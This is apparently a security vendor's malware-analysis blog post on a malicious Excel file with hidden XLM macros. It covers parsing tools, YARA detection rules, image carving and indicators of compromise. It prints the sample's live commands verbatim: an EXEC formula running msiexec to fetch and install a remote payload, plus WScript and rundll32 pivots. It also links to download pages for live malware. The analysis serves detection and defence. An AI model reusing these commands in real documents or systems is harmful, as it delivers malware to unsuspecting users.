Extracting "Sneaky" Excel XLM Macros
In this article, we present our in-depth analysis of a malicious Microsoft Excel document (an XLS file carrying XLM macros) that we found in the wild. We show how existing open source tools can be used to carve out interesting artifacts. Along the way, we point out some tool limitations and present our solution for closing the gap. Ultimately, our goal is to orchestrate the carving of as many artifacts as possible, for robust threat detection and prevention.
The sample we’ll dive into originally popped up on our radar a few weeks ago, just around the new year. We received it through one of our VirusTotal Intelligence YARA hunt rules that search for suspicious Microsoft Office documents. The initial sample and some relevant reports:
- SHA256: 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
- Multi-AV: VirusTotal
- Sandbox detonation: Hybrid-Analysis
- Downloadable Samples
Initial AV detection was rather low (3/59); we’ll see why when we dive into the analysis. As of this blog’s publication, 30 days have passed and the file has been rescanned 6 times, with 9 out of 59 engines now detecting the threat.
A Cursory Glance
First, we open the XLS file with Microsoft Excel in a virtual environment to see what it looks like to an end-user. This Excel file contains a single spreadsheet, and the spreadsheet contains a single image that instructs the reader to click “Enable content” in order to view/edit the document (Fig 1); this is a common social engineering attempt to entice the user into allowing execution of the first stage of the malware payload:
Note that the social engineering component of this document lure is enough on its own to trigger InQuest threat prevention, in this particular case through the Optical Character Recognition (OCR) layer of our Deep File Inspection® (DFI) stack.
Let’s use the popular oledump and olevba Python scripts to examine whether the XLS file contains any VBA macros:
$ olevba3 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:-------- 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
===============================================================================
FILE: 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
Type: OLE
No VBA macros found.
$ oledump.py 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
1: 4096 '\x05DocumentSummaryInformation'
2: 4096 '\x05SummaryInformation'
3: 173064 'Workbook'
According to both tools, the document seemingly doesn’t contain any VBA macros. Note that oledump can leverage an additional plugin to dive deeper into the file; more on this later. To investigate further, we’ll employ a Windows GUI structured storage viewer, SSView, and a hex editor, in this case Hexinator.
A Deeper Dive
XLS is a Compound Document File (CDF or CF) or Object Linking and Embedding (OLE) File; thus, it can be explored with any OLE/CF viewer such as SSView. OLE files are hierarchical data structures consisting of several storages and streams, analogous to folders and files on your standard file system. Fig 2 shows the structure of this particular XLS file in SSView. In this file, the Workbook stream is interesting as it contains all the information related to this workbook such as the included sheets. The structure of this stream is fully specified in Microsoft Office Excel 97-2007 – Binary File Format Specification. We dump the Workbook stream to the filesystem by right-clicking on its name and then selecting “Save stream …”.
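As a quick complement to the GUI viewers, the container type can be confirmed from the first bytes of the file. The following is a minimal sketch, assuming only the fixed header layout of the compound file format (signature at offset 0, version and sector-shift fields at offsets 24 to 33); the function name `parse_cfb_header` is ours, and the demo header is synthetic rather than taken from the sample.

```python
import struct

# Signature that opens every OLE / Compound File Binary container.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


def parse_cfb_header(data: bytes) -> dict:
    """Return a few fixed-offset fields from a compound file header."""
    if len(data) < 34 or data[:8] != OLE_MAGIC:
        raise ValueError("not an OLE compound file")
    # Offsets 24..33 hold five little-endian uint16 values:
    # minor version, major version, byte order, sector shift, mini sector shift.
    minor, major, byte_order, sector_shift, mini_shift = struct.unpack_from(
        "<5H", data, 24
    )
    return {
        "major_version": major,
        "minor_version": minor,
        "byte_order": byte_order,
        "sector_size": 1 << sector_shift,
        "mini_sector_size": 1 << mini_shift,
    }


if __name__ == "__main__":
    # Synthetic header for illustration only (not bytes from the sample).
    demo = OLE_MAGIC + bytes(16) + struct.pack("<5H", 0x3E, 3, 0xFFFE, 9, 6)
    print(parse_cfb_header(demo))
```

To try it on a real file, pass the first 512 bytes of the document to `parse_cfb_header`. Listing the storages and streams themselves requires walking the FAT and directory sectors, which is what tools such as SSView, 7zip, and oledump do for us.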
Note that we can also use 7zip to extract all storages and streams from an OLE compound file. 7zip creates a folder and a file for each relevant storage and stream parsed out of the compound file. We pull the extracted Workbook stream into our hex editor, and can spot a cmd.exe pivot at offset 0x028ABB as depicted in Fig 3.
Why the pivot through msiexec.exe? It’s one of a myriad of “Living off the Land” (LOL) techniques that attackers employ to mask their activity from runtime endpoint security monitoring tools. For a well-maintained list of LOL binaries and libraries, see the LOLBAS project, which has a section dedicated to msiexec. The serf=19 bit is interesting; see the relevant documentation in the MSDN article for Custom Action Type 19. This makes for a good hunt rule on its own. We’re looking for serf=19 specifically, or any other serf= together with msiexec and a URL prefix of http:
// see: https://github.com/InQuest/yara-rules/
rule MSIExec_Pivot
{
strings:
$serf19 = "serf=19" nocase ascii wide
$msiserf1 = "msiexec" nocase ascii wide
$msiserf2 = "serf=" nocase ascii wide
$msiserf3 = "http" nocase ascii wide
condition:
$serf19 or all of ($msiserf*)
}
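For readers without YARA at hand, the same matching logic can be approximated in plain Python. This is a rough sketch and not a replacement for the rule: the helper names are ours, and it only mimics the `nocase ascii wide` modifiers by lowercasing the buffer and searching for both the ASCII and UTF-16LE encodings of each string.

```python
def _contains(data: bytes, needle: str) -> bool:
    """Case-insensitive search for needle as ASCII or UTF-16LE ("wide")."""
    haystack = data.lower()  # bytes.lower() only touches ASCII letters
    low = needle.lower()
    return low.encode("ascii") in haystack or low.encode("utf-16-le") in haystack


def msiexec_pivot(data: bytes) -> bool:
    """Mirror the condition: $serf19 or all of ($msiserf*)."""
    if _contains(data, "serf=19"):
        return True
    return all(_contains(data, s) for s in ("msiexec", "serf=", "http"))


if __name__ == "__main__":
    # Hypothetical buffers for illustration only.
    print(msiexec_pivot(b"MSIEXEC.EXE SERF=19 /i http://example.invalid/x"))
    print(msiexec_pivot(b"msiexec /i local.msi"))
```

As with the rule itself, this is a hunting heuristic: a hit means the buffer deserves a closer look, not that it is malicious.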
Before shifting focus to the actual MSI file that the msiexec pivots to, let’s take a brief look at the domain office365advance[.]com. It was registered only recently, a few days before the sample in question was first seen on VirusTotal. The resolving IP address geolocates to Russia and appears to host another domain as well:
Domain | IP | Registration Date | Location |
---|---|---|---|
office365advance[.]com | 185.68.93.84 | 12/26/2018 | Russia |
krontvhouse[.]com | 185.68.93.84 | 2014 | Russia |
Further pivots can be made to uncover other related infrastructure. We leave this as an exercise for the reader and instead examine the MSI installer that is retrieved from this domain. The MSI file has a SHA256 hash of a5bc8c8b89177f961aa5c0413716cb94b753efbea1a1ec9061be53b1be5cd36a and was initially uploaded to VirusTotal on the same day that office365advance[.]com was registered. Initial detection was a meager 2 engines; today, 36 AV vendors properly detect this file as malicious. A simple string analysis on the MSI reveals the URL www.exetomsi.com, which hosts a free tool for converting executable files (.exe) to MSI installers. It turns out this is a valuable hunting rule as well. We’ve been watching the results for a while, and plenty of other malware authors are converting their payloads to MSI using this tool:
// see: https://github.com/InQuest/yara-rules/
rule Executable_Converted_to_MSI
{
strings:
$magic = /^\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00/
$url = "www.exetomsi.com" nocase
condition:
$magic at 0 and $url
}
Obviously, this string is easily bleached and thus this signature is easily evaded. Finer selected heuristics will provide a more robust hunt rule, again left as an exercise for the reader.
The MSI file in turn contains a malicious binary (c354467ec5d323fecf94d33bc05eab65f90a916c39137d2b751b0e637ca5a3e4). Upon execution, it drops a VBS script (rds.vb, 8a5041d41c552c5df95e4a18de4c343e5ac54845e275262e99a3a6e1a639f5d4), a batch file (help.bat, 91237a76e43caa35e3fbd42d47fbaca5d6b5ea7a96c89341196d070b628122ce), and a Windows DLL (htpd.dat, 79a56ca8a7fdeed1f09466af66c24ddef5ef97ac026297f4ea32db6e01a81190). The VBS script simply executes the dropped help.bat file via a WScript.Shell pivot:
# RDS.VB
CreateObject("WScript.shell").run "cmd /c %temp%\help.bat", 0, False
The executed batch file in turn pivots to the dropped DLL by way of rundll32.exe. Note the entry point of the DLL here is bogus():
# HELP.BAT
rundll32.exe C:\Users\ZGSPBU~1\AppData\Local\Temp\htpd.dat, bogus
The DLL was also uploaded to VirusTotal on 12/26/18, the date of the domain registration. Initial detection was at 4, whereas today the majority of AV engines (46) successfully detect the DLL as malicious. Unfortunately, this is the end of the line for our investigation. As of the time of research, htpd.dat:bogus() attempts to retrieve a next-stage payload from one unreachable server and another unregistered one. We’ve made public a Joe Sandbox Detonation Report for your perusal.
Within that report we can see two possible domains for next-stage retrieval:
URL | Status |
---|---|
hxxps://vesecase[.]com/support/form.php | Offline |
hxxps://afsssdrfrm[.]pw/support/form.php | Unregistered |
Peering back into the history of the registered, but currently offline domain, we can see that as of 12/20/2018 vesecase[.]com was hosting a default Apache Ubuntu install page:
Macroless Command Execution?
What of the original pivot though? How does the Excel malware lure transition from the user’s enabling of active content to the cmd.exe / msiexec combination? It turns out the active content resides within an XLM macro, an age-old technology that is giving AV some grief as of late. These kinds of techniques appear from time to time. Collating documents through capture (data-in-motion) and aggregation (data-at-rest) into the InQuest platform empowered by Deep File Inspection (DFI) provides threat hunting teams with an analysis tool to discover previously undiscovered and targeted threats… just like this.
To discover the answer, we’ll take an even deeper look at the Workbook stream, which is in the BIFF8 format. First, we’ll take an interactive look with the Windows tool BIFFView++. As depicted in Figs 4 and 5, the msiexec command is found within a Cell Formula (6h) record. That record is contained within the very first cell of the spreadsheet, A1 (column ‘A’, row ‘1’).
Now, we need to determine the sheet that contains this particular cell formula. According to the XLS binary format specification, all information about a sheet, such as its name, type, and stream position, is kept within a BOUNDSHEET record (85h). In Fig 6, we can see that this workbook has two BOUNDSHEET records, which means it has two sheets. However, one of them must be hidden, as we can only see one sheet in Fig 1.
The first sheet starts at offset 0x028938 and the second one at offset 0x028C17. The cell formula that we are interested in is located at 0x028ABB, which places this cell in the first sheet, a hidden macro sheet. We can unhide the sheet either by setting the hidden state to zero within the file or by toggling the setting through the Excel interface. It is interesting to note that the hidden state can also be set to 2, which is called the very hidden state. Very hidden sheets cannot be unhidden through the Excel interface; they can only be toggled to visible via manual hex editing of the file. After unhiding the macro sheet, we can see the embedded macro clearly in the Excel GUI.
This formula is triggered when the document is opened (the Auto_Open label points to cell A1): the user is asked to enable active content, and then the cmd.exe/msiexec pivot and the subsequent chain of events execute automatically. As mentioned earlier, XLM 4.0 macros are an arcane technology that predates even VBA (which was introduced in Excel 5.0).
We’re afforded yet another hunting opportunity here. The following YARA rule will detect Excel files with either hidden or very hidden macro sheets. Please note that not all Excel files with hidden macro sheets are malicious.
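The BOUNDSHEET lookup described above can also be scripted against a dumped Workbook stream. Below is a minimal sketch, assuming the BIFF8 layout in which every record is a 2-byte opcode, a 2-byte length, and then the data, and in which a BOUNDSHEET record holds a 4-byte stream position, a 1-byte hidden state, a 1-byte sheet type, and a short string for the name. The function names are ours, and the sheet names in the demo are made up.

```python
import struct

BOUNDSHEET = 0x0085
STATES = {0: "visible", 1: "hidden", 2: "very hidden"}
KINDS = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VBA module"}


def iter_records(stream: bytes):
    """Yield (offset, opcode, data) for each BIFF record in a Workbook stream."""
    pos = 0
    while pos + 4 <= len(stream):
        opcode, size = struct.unpack_from("<HH", stream, pos)
        yield pos, opcode, stream[pos + 4 : pos + 4 + size]
        pos += 4 + size


def list_sheets(stream: bytes) -> list:
    """Decode every BOUNDSHEET record into a small dictionary."""
    sheets = []
    for offset, opcode, data in iter_records(stream):
        if opcode != BOUNDSHEET or len(data) < 8:
            continue
        bof_offset, state, kind, cch, flags = struct.unpack_from("<IBBBB", data, 0)
        raw = data[8:]
        # Bit 0 of the string flags selects UTF-16LE (1) or 8-bit characters (0).
        if flags & 0x01:
            name = raw[: cch * 2].decode("utf-16-le", errors="replace")
        else:
            name = raw[:cch].decode("latin-1")
        sheets.append({
            "record_offset": offset,
            "bof_offset": bof_offset,
            "state": STATES.get(state & 0x03, "unknown"),
            "kind": KINDS.get(kind, "unknown"),
            "name": name,
        })
    return sheets


if __name__ == "__main__":
    # Synthetic two-sheet stream; "Macro1" and "Sheet1" are made-up names.
    def rec(opcode, data):
        return struct.pack("<HH", opcode, len(data)) + data

    demo = rec(BOUNDSHEET, struct.pack("<IBB", 0x28938, 1, 1) + b"\x06\x00Macro1")
    demo += rec(BOUNDSHEET, struct.pack("<IBB", 0x28C17, 0, 0) + b"\x06\x00Sheet1")
    for sheet in list_sheets(demo):
        print(sheet)
```

The hidden-state byte sits 8 bytes past `record_offset` (4 bytes of record header plus 4 bytes of stream position), which is the byte to zero out when unhiding a sheet by hand.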
// see: https://github.com/InQuest/yara-rules/
rule Excel_Hidden_Macro_Sheet
{
strings:
$ole_marker = {D0 CF 11 E0 A1 B1 1A E1}
$macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
$macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
condition:
$ole_marker at 0 and 1 of ($macro_sheet_h*)
}
To programmatically extract XLM macros from an Excel Workbook, we can lean on the BIFF plugin that is bundled with @DidierStevens’ oledump tool. This plugin recognizes a number of functions such as EXEC, REGISTER, and HALT. First, let’s explore the BIFF objects by count:
# BIFF dump, sorted by record type popularity, with partial annotations.
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 | tr -s ' ' | cut -d' ' -f4 | sort | uniq -c | sort -nr
63 XF # Extended Format 5.115
47 STYLEEXT
47 STYLE
42 ROW
41 XFEXT
40 MULBLANK
20 FORMAT
17 CONTINUE # record code=3C00XXXX (typically 3C002020 for record size)
3 EOF
3 DBCELL
3 BOF
2 WSBOOL
2 WINDOW2
2 VCENTER
2 TOPMARGIN
2 SETUP
2 SELECTION
2 SAVERECALC
2 RIGHTMARGIN
2 REFMODE
2 PRINTHEADERS
2 PRINTGRIDLINES
2 PLV
2 MSODRAWINGGROUP # code=eb002020 this is where your images are.
2 MSODRAWING # related
2 LEFTMARGIN
2 ITERATION
2 INDEX
2 HEADERFOOTER
2 HEADER
2 HCENTER
2 GUTS
2 GRIDSET
2 FORMULA # EXEC, HALT, etc. the macro content
2 FOOTER
2 FEATHEADR
2 DIMENSIONS
2 DELTA
2 DEFCOLWIDTH
2 DEFAULTROWHEIGHT
2 COLINFO
2 CALCMODE
2 CALCCOUNT
2 BOUNDSHEET # Spreadsheets
2 BOTTOMMARGIN
1 plugin
1 XFCRC
1 WRITEACCESS
1 WINDOWPROTECT
1 WINDOW1
1 USESELFS
1 THEME
1 TABLESTYLES
1 TABID
1 SUPBOOK
1 SST
1 REFRESHALL
1 RECALCID
1 PROTECT
1 PROT4REVPASS
1 PROT4REV
1 PRECISION
1 PLS
1 PASSWORD
1 OBJ
1 MTRSETTINGS
1 MMS
1 MERGECELLS
1 LABEL # This record represents a cell that contains a string.
1 INTERFACEHDR
1 INTERFACEEND
1 HIDEOBJ
1 HFPicture
1 FORCEFULLCALCULATION
1 FNGROUPCOUNT
1 EXTSST
1 EXTERNSHEET
1 EXCEL9FILE
1 DSF
1 COUNTRY
1 COMPRESSPICTURES
1 COMPAT12
1 CODEPAGE
1 BOOKEXT
1 BOOKBOOL
1 BACKUP
1 1904
If you’re looking for “interesting” records, start by grepping for “sheet”, “label”, and “formula”. Let’s look for the Auto_Open label and dump it, then dump the formulas to find the cmd/msiexec combination:
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-o label -s"
1: 4096 '\x05DocumentSummaryInformation'
2: 4096 '\x05SummaryInformation'
3: 173064 'Workbook'
Plugin: BIFF plugin
'0018 31 LABEL : Cell Value, String Constant - \x00Auto_Ope'
ASCII:
Auto_Open:
002a 2 PRINTHEADERS : Print Row/Column Labels
002a 2 PRINTHEADERS : Print Row/Column Labels
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-o formula"
1: 4096 '\x05DocumentSummaryInformation'
2: 4096 '\x05SummaryInformation'
3: 173064 'Workbook'
Plugin: BIFF plugin
0160 2 USESELFS : Natural Language Formulas Flag
'0006 129 FORMULA : Cell Formula - R1C1 107 ptgStr "msiexec.exe serf=19 skip=1 /i http://office365advance.com/update /q OnStart='c:\windows\notepad.exe'" ptgFuncVarV args 1 func 006e (EXEC) '
0006 26 FORMULA : Cell Formula - R2C1 4 ptgFuncVarV args 0 func 0036 (HALT)
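The sizes in the output above line up with the record layout: a FORMULA record carries 20 bytes of cell metadata, a 2-byte token-stream length, and then the tokens, so 22 + 107 = 129 for the EXEC cell and 22 + 4 = 26 for HALT. The following sketch pulls out the leading string token from such records. It is deliberately narrow: it assumes BIFF8, handles only formulas whose first token is ptgStr (17h), and does not parse the remaining tokens as the plugin does. The function names are ours, and the command in the demo is a harmless placeholder.

```python
import struct

FORMULA = 0x0006
PTG_STR = 0x17  # string constant token


def iter_records(stream: bytes):
    """Yield (opcode, data) for each BIFF record in a Workbook stream."""
    pos = 0
    while pos + 4 <= len(stream):
        opcode, size = struct.unpack_from("<HH", stream, pos)
        yield opcode, stream[pos + 4 : pos + 4 + size]
        pos += 4 + size


def leading_formula_strings(stream: bytes):
    """Yield (row, col, text) for FORMULA records that start with ptgStr.

    Row and column are zero-based, so (0, 0) is cell A1.
    """
    for opcode, data in iter_records(stream):
        if opcode != FORMULA or len(data) < 25:
            continue
        row, col = struct.unpack_from("<HH", data, 0)
        (cce,) = struct.unpack_from("<H", data, 20)  # token stream length
        rgce = data[22 : 22 + cce]
        if len(rgce) < 3 or rgce[0] != PTG_STR:
            continue
        cch, flags = rgce[1], rgce[2]
        raw = rgce[3:]
        # Bit 0 of the flags selects UTF-16LE (1) or 8-bit characters (0).
        if flags & 0x01:
            text = raw[: cch * 2].decode("utf-16-le", errors="replace")
        else:
            text = raw[:cch].decode("latin-1")
        yield row, col, text


if __name__ == "__main__":
    # Synthetic FORMULA record; "calc.exe" is a placeholder, not the sample's command.
    tokens = bytes([PTG_STR, 8, 0]) + b"calc.exe" + bytes([0x42, 1, 0x6E, 0x00])
    body = bytes(20) + struct.pack("<H", len(tokens)) + tokens
    demo = struct.pack("<HH", FORMULA, len(body)) + body
    print(list(leading_formula_strings(demo)))
```

Formulas that build their command from several concatenated tokens will not be recovered this way; for those, a full token walker such as the one in plugin_biff is the better tool.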
Next, let’s take a look at how one could programmatically carve the image component out of the document lure.
Carving Images from XLM
As mentioned in the beginning, our aim is to carve as much as possible from this file. Thus, we are also interested in extracting the image embedded in this document. This is a precursor to extracting the semantic meaning through Optical Character Recognition (OCR). Common choices to accomplish this task generically include forensic tools such as foremost and scalpel. We’ll show an example of using scalpel here. However, neither provides a copy with the same fidelity as what is originally displayed upon opening the Excel document in a virtual machine:
# applicable scalpel rules:
# GIF and JPG files (very common)
# gif y 5000000 \x47\x49\x46\x38\x37\x61 \x00\x3b
# gif y 5000000 \x47\x49\x46\x38\x39\x61 \x00\x00\x3b
# jpg y 200000000 \xff\xd8\xff\xe0\x00\x10 \xff\xd9
# jpg y 200000000 \xff\xd8\xff\xe1 \xff\xd9
$ scalpel -c /etc/scalpel.conf 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526/workbook
Fig. 9 shows the output of the carved file by scalpel in the default image viewer on Windows 10.
Why is the file corrupted? Within the XLS/BIFF8 format, records have a maximum size of 8,228 bytes (a 4-byte header plus up to 8,224 bytes of data). If the data is larger than what fits in a single record, it must be split into chunks. The first chunk is put in the first record, and the remaining chunks are placed in subsequent CONTINUE (3Ch) records. To successfully extract images from XLS files, one needs to strip these CONTINUE headers from the extracted image. To accomplish this task automatically, we’ve extended the oledump BIFF plugin (plugin_biff.py) to include a new command line switch for extracting images. You can find our patch in our GitHub repository (lines 570 to 603):
https://github.com/InQuest/DidierStevensSuite/blob/BIFF-Image-Dump-Switch/plugin_biff.py#L570-L592
Here it is in action:
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-h"
Usage: oledump.py [options]
Options:
-h, --help show this help message and exit
-e, --extract Extract images
-s, --strings Dump strings
-a, --hexascii Dump hex ascii
-o OPCODE, --opcode=OPCODE
Opcode to filter for
-f FIND, --find=FIND Content to search for
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-e"
1: 4096 '\x05DocumentSummaryInformation'
2: 4096 '\x05SummaryInformation'
3: 173064 'Workbook'
Plugin: BIFF plugin
00003255 0866 126 HFPicture : Header / Footer Picture
00005279 00eb 8224 MSODRAWINGGROUP : Microsoft Office Drawing Group
[EB] image + 8107 = 8107 bytes
0000729d 00eb 8224 MSODRAWINGGROUP : Microsoft Office Drawing Group
[EB] image + 8224 = 16331 bytes
000092c1 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 24555 bytes
0000b2e5 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 32779 bytes
0000d309 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 41003 bytes
0000f32d 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 49227 bytes
00011351 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 57451 bytes
00013375 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 65675 bytes
00015399 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 73899 bytes
000173bd 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 82123 bytes
000193e1 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 90347 bytes
0001b405 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 98571 bytes
0001d429 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 106795 bytes
0001f44d 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 115019 bytes
00021471 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 123243 bytes
00023495 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 131467 bytes
000254b9 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 139691 bytes
000274dd 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 147915 bytes
00027c6f 003c 1934 CONTINUE : Continues Long Records
[3C] image + 1934 = 149849 bytes
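The accumulation shown in the output can be illustrated with a short standalone sketch. This is not the code from our plugin patch; it is a simplified approximation that assumes the same record framing (2-byte opcode, 2-byte length, data) and simply concatenates the data of each MSODRAWINGGROUP (EBh) record with the CONTINUE (3Ch) records that directly follow it, dropping the 4-byte record headers that corrupt a naively carved image. The function names are ours.

```python
import struct

MSODRAWINGGROUP = 0x00EB
CONTINUE = 0x003C


def iter_records(stream: bytes):
    """Yield (opcode, data) for each BIFF record in a Workbook stream."""
    pos = 0
    while pos + 4 <= len(stream):
        opcode, size = struct.unpack_from("<HH", stream, pos)
        yield opcode, stream[pos + 4 : pos + 4 + size]
        pos += 4 + size


def reassemble(stream: bytes, opcode: int = MSODRAWINGGROUP) -> bytes:
    """Join the data of `opcode` records and the CONTINUE records after them."""
    out = bytearray()
    collecting = False
    for rec_opcode, data in iter_records(stream):
        if rec_opcode == opcode:
            collecting = True
            out += data
        elif rec_opcode == CONTINUE and collecting:
            out += data
        else:
            # Any other record ends the run; later CONTINUEs belong elsewhere.
            collecting = False
    return bytes(out)


if __name__ == "__main__":
    # Synthetic stream for illustration only.
    def rec(opcode, data):
        return struct.pack("<HH", opcode, len(data)) + data

    demo = rec(MSODRAWINGGROUP, b"AAAA") + rec(CONTINUE, b"BBBB") + rec(0x000A, b"")
    print(reassemble(demo))
```

The reassembled buffer is still a drawing-group container, so the image bytes have to be located inside it (for example by searching for a JPEG or PNG signature) before they can be written out and handed to OCR.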
Conclusion
In this article, we analyzed a stealthy malicious Excel document that relies on XLM macros, an age-old technology superseded by VBA, to run embedded commands. We showed in detail how such macros can be located in XLS binary files and how to carve out other useful information such as image files. Last but not least, we presented three YARA rules that can be used to capture malware instances that use similar techniques.
If you’re interested in a similar sample, take a look at:
- VT: 6f807662e04b5cfb85bc892e27a29994ddcf78e7c3311581753761fede3d5bd1
- Pivot: add3565office[.]com/rstr
- Final: pointsoft[.]pw
Malware Samples (All Stages)
Note: The following contains links to actual malware. Although the files lack extensions, care should be taken. Not everyone has access to VirusTotal, and we want to ensure that samples are freely available for all researchers to improve their tradecraft.
Stage | Parent Process | File Type | Name | SHA256… | Download |
---|---|---|---|---|---|
1 | EXCEL | XLS | | 98e4695e… | download |
2 | MSIEXEC | MSI | | a5bc8c8b… | download |
3 | MSIEXEC | EXE | | c354467e… | download |
4 | WSCRIPT | VBS | rds.vbs | 8a5041d4… | download |
5 | CMD | BAT | help.bat | 91237a76… | download |
6 | RUNDLL32 | DLL | htpd.dat | 79a56ca8… | download |
YARA Hunting Rules
The YARA rules we defined inline above are available, along with other YARA rules we wish to share with the community. These rules should not be considered production appropriate. Rather, they are valuable for research and hunting purposes:
Other YARA rules that we’ve open-sourced can be found at https://github.com/InQuest/yara-rules/. Additionally, we maintain a curated list of awesome YARA rules, tools, and people over at: https://github.com/InQuest/awesome-yara/.
References
- https://blog.inquest.net/blog/2018/02/12/deep-file-inspection
- http://download.microsoft.com/download/1/A/9/1A96F918-793B-4A55-8B36-84113F275ADD/Excel97-2007BinaryFileFormat(xls)Specification.pdf
- https://www.openoffice.org/sc/excelfileformat.pdf
- https://msdn.microsoft.com/en-us/library/dd942138.aspx
- https://www.mitec.cz/ssv.html
- https://www.aldeid.com/wiki/BiffView
- https://lolbas-project.github.io/lolbas/Binaries/Msiexec/
- https://github.com/decalage2/oletools
- https://blog.didierstevens.com/programs/oledump-py/
- http://www.exetomsi.com
- https://research.domaintools.com/research/screenshot-history/vesecase.com/#0
- http://whois.domaintools.com/vesecase.com
- http://whois.domaintools.com/office365advance.com
IOCs
- 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
- a5bc8c8b89177f961aa5c0413716cb94b753efbea1a1ec9061be53b1be5cd36a
- c354467ec5d323fecf94d33bc05eab65f90a916c39137d2b751b0e637ca5a3e4
- 8a5041d41c552c5df95e4a18de4c343e5ac54845e275262e99a3a6e1a639f5d4
- 91237a76e43caa35e3fbd42d47fbaca5d6b5ea7a96c89341196d070b628122ce
- 79a56ca8a7fdeed1f09466af66c24ddef5ef97ac026297f4ea32db6e01a81190
- office365advance[.]com
- hxxp://office365advance[.]com/update
- krontvhouse[.]com
- 185.68.93.84
- vesecase[.]com
- hxxps://vesecase[.]com/support/form.php
- afsssdrfrm[.]pw
- hxxps://afsssdrfrm[.]pw/support/form.php
- add3565office[.]com
- add3565office[.]com/rstr
- pointsoft[.]pw